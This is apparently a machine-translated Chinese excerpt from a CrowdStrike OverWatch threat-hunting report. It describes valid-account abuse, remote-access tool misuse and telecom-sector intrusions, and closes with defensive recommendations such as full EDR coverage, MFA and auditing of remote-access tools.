攻击者可以使用多种技术来破坏有效帐户并利用它们进行恶意使用。一些技术,例如鱼叉式网络钓鱼附件 26 和密码喷涂 27,可以创建相对容易识别的可预测遥测模式。其他的,例如用户执行远程访问工具或通过虚假登录门户泄露凭据,则更难检测。虽然用户教育是应对这种威胁的重要组成部分,但防御者必须能够检测到不可避免的妥协和随之而来的入侵。对于对手来说,在目标环境中获得执行力只是实现目标的第一步。随着对手不断前进,每一步都成为威胁猎手识别入侵者足迹的机会。在这次入侵中,当攻击者向主机写入低流行率和已知的可疑工具时,威胁猎人找到了他们的第一个线索。通过使用 CrowdStrike Threat Graph 将来自多个主机的同一账户的相同指标关联起来,潜在横向移动的图片开始形成。然而,在这个阶段,对手的第一个足迹可能被解释为系统管理员使用远程访问软件部署内部开发的软件(这将解释新颖的哈希签名)。当对手试图建立持久性并采取措施避免检测和防御时,他们会举手。确实,合法软件可能会隐藏安装目录以掩盖复杂性或防止意外的用户篡改。然而,当观察到隐蔽或规避措施与前述活动相结合时,它们会在威胁追踪者的脑海中增加进一步的怀疑。在这次入侵中,威胁猎手的怀疑被更令人震惊的企图与伪装成有效操作系统功能的计划任务名称混合在一起的尝试所证实。最后,从 Windows Defender 扫描中排除 Prilex 恶意软件目录确认了长期不间断收集操作的意图。结论和建议 用户启用的入侵允许攻击者绕过 MITRE ATT&CK 矩阵中的某些策略。然而,这不应该让勤奋的威胁搜寻者担心,他们配备了足够的遥测技术,并且了解对手目标所需的步骤以及这些步骤留下的足迹。关键是通过有效的 EDR 抑制对手的进展,同时将指标放在一起以识别威胁并及时做出反应。电子犯罪参与者使用合法的非本地远程访问工具,例如 TeamViewer、AnyDesk 或 VNC(及其变体)仍然很常见。在去年,OverWatch 观察到的大约 5% 的电子犯罪入侵尝试中存在此类工具。系统管理员最好限制和审核在他们的环境中使用此类工具,即使是授权用例也是如此。众所周知,攻击者会搜索远程访问工具使用的侦听端口和存储的凭据,以利用预先安装的横向移动选项。
电信目标
在过去的一年里,OverWatch 观察到针对电信行业的交互式入侵活动激增,入侵尝试的数量同比翻了一番多。这项活动跨越了所有主要地理区域,并与各种各样的对手联系在一起。这种活动通常由与中国联系的对手进行,但《守望先锋》还发现了与伊朗联系的对手和其他身份不明但可能有针对性的入侵对手的行动。有针对性的入侵对手经常对电信提供商进行操作,以完成他们的监视、情报和反情报收集工作。这包括访问诸如呼叫详细记录 (CDR) 之类的信息,对于移动提供商,还包括短消息服务 (SMS) 通信。在某些情况下,例如本节中的案例研究,在同一受害者环境中发现多个目标入侵对手同时活跃,可能彼此不知道。 Tradecraft 电信供应商在现代社会中发挥着独特而关键的作用。大多数企业、政府和个人依靠电信提供商来实现各种通信方式。电信系统的中心性和普遍性使其成为全球政府和犯罪分子的高价值目标。有针对性的入侵对手通常证明自己擅长了解这些系统的运作方式,并且擅长在 Windows、Linux 和 Solaris 环境中导航。在针对电信行业使用的常见初始访问技术包括鱼叉式网络钓鱼、漏洞利用、合法凭证的使用和供应链妥协。一旦获得访问权限,攻击者通常会利用服务或使用系统本机工具(例如 Windows 管理规范 (WMI) 和各种命令和脚本解释器)来执行其余的操作。为了保持对受害者环境的访问,攻击者会定期主动识别可能为凭证收集和横向移动创造机会的感兴趣的主机。在许多情况下,攻击者使用 Windows net 命令、ping、telnet、SSH、PowerShell 和 WMI 等内置工具探索环境。
结论
电信组织不仅是我们关键基础设施的一部分,
它们是敏感且非常有价值的数据的存储库。由于这些原因,
电信业很可能仍是一个高价值的目标。守望先锋有
观察到的对手针对与特定感兴趣的人相关的数据,此外
对数据库记录进行大规模渗漏,可能是为了掩盖
他们的具体目标。
OverWatch 发现电线中的双重问题
2021 年第一季度,OverWatch 在位于中东、土耳其和非洲 (META) 地区的一家电信实体中发现了复杂的入侵活动。如上所述,电信组织长期以来一直是专注于下游客户定位和情报收集操作的国家关系对手的目标。对观察到的 TTP 进行更深入的分析表明,受害者组织同时成为两个不同的威胁行为者的目标。值得注意的是,似乎同时存在有针对性的入侵和出于犯罪动机的入侵。观察到这两个威胁行为者在一系列基于 Linux 和 Windows 的主机上针对目标采取行动。在组织的 Linux 环境中观察到的交易与之前观察到的由 CrowdStrike Intelligence 跟踪的活动重叠,作为 LightBasin 活动集群的一部分。虽然 CrowdStrike 没有将特定的地理起源归因于 LightBasin,但该活动已被评估为与有针对性的入侵行动一致。相比之下,在该组织的 Windows 环境中观察到的活动被怀疑是由电子犯罪参与者进行的。在这两种环境中,OverWatch 观察到多个有效帐户的使用,包括 Linux 上的 root 帐户和 Windows 上的域和后门本地帐户的工具包。除了广泛的侦察和信息收集操作外,OverWatch 还确定了大量演员工具的部署。在这些工具中,有一些远程管理实用程序,这表明建立和维护对受害环境进行持久远程访问的多种方法是一个核心任务目标。两个演员都努力地试图逃避侦查并隐瞒他们的行动。特别是,OverWatch 经常观察到它们在没有 Falcon 传感器覆盖的主机上运行。当端点或其他设备不受 Falcon 覆盖时存在风险,因此 CrowdStrike 强烈鼓励在整个环境中尽可能广泛地使用 Falcon 传感器。
。。。。
结论
一年前,《守望先锋》报告称,组织在竞相采用在家工作的做法并适应迅速升级的 COVID-19 危机所施加的限制时,面临着越来越多的网络威胁。不幸的是,随后的 12 个月几乎没有为防守者提供缓刑。在过去的一年里,世界经历了一些最重要和最广泛的网络攻击。 OverWatch 看到交互式入侵活动继续以创纪录的水平继续。 eCrime 和有针对性的入侵对手都在不断发展和成熟他们的技术,寻找新的方法来诱捕他们的受害者。电子犯罪的威胁仍然很大,并且已经看到攻击者利用多种途径来访问受害环境——无论是直接访问还是利用访问代理。此外,一旦获得访问权限,eCrime 攻击者就会证明擅长在受害者网络中快速移动,突破时间很短就证明了这一点。 (在超过三分之一的 OverWatch 发现 eCrime 攻击者爆发的情况下,他们能够在 30 分钟内横向移动。)有针对性的入侵攻击者也没有表现出放缓的迹象。电信行业尤其受到重创,入侵企图增加了一倍以上,占 OverWatch 观察到的所有目标入侵活动的 40%。对 Microsoft Exchange 服务器漏洞的大规模利用也是一个低谷,及时提醒人们注意状态关系对手拥有的能力以及发现和利用新漏洞的不断存在的威胁。在这一切中,OverWatch 仍然保持警惕,为其客户提供所需的全天候覆盖,以应对过去 12 个月和未来的起起落落。接下来的防御建议借鉴了威胁猎人在过去一年中每天与对手正面交锋中收集到的见解。建议 推出它。 OverWatch 发现攻击者越来越擅长识别组织安全覆盖中的盲点。在所有端点上部署包括 NGAV 和 EDR 在内的完整端点保护至关重要。 OverWatch 观察到的大量入侵企图来自没有 Falcon 传感器覆盖范围的主机,这为攻击者提供了在阴影中操作的机会。保护您最有价值的资产需要对所有资产的可见性。打开它。拥有全面的安全对策并在您使用的产品中启用预防功能至关重要。如果安全解决方案到位,但未配置为提供适当级别的保护,那么您就给了对手一个先机。保持警惕并准备好采取行动。攻击者正在继续寻找破坏组织的新方法,并且可以在几分钟内横向移动。防御者必须全天候狩猎,并且必须准备好在几分钟内采取行动。 OverWatch 和 Falcon Complete 等顶级托管服务提供专业知识、资源和覆盖范围,以增强您现有的团队。保持良好的卫生习惯。作为基准,您的组织应该建立对在您的环境中运行的软件的控制并消除不需要的软件。确保您的环境与最新补丁保持同步也很重要。保护您的身份。有效帐户为攻击者提供了易于使用且难以从合法活动中辨别出来的访问权限。最好的防御措施是首先阻止有效凭证落入坏人之手。组织应避免使用默认帐户并建立和实施强密码策略,包括使用多因素身份验证。同样重要的是不要将敏感或与凭据相关的信息存储在未加密的文件中。为了减轻攻击者使用有效帐户的影响,防御者应采用最小权限原则,并定期监控身份验证日志、帐户创建和用户权限的变化。密切关注远程访问。电子犯罪参与者使用合法的非本地远程访问工具,例如 TeamViewer、AnyDesk 或 VNC(及其变体)是很常见的。防御者应限制和审核此类工具在其环境中的使用,即使是授权用例。通过不将 SMB 和 RDP 端口暴露给 Internet,可以防止许多常见的漏洞利用尝试。任何可从外部访问的服务都应受到密切监控。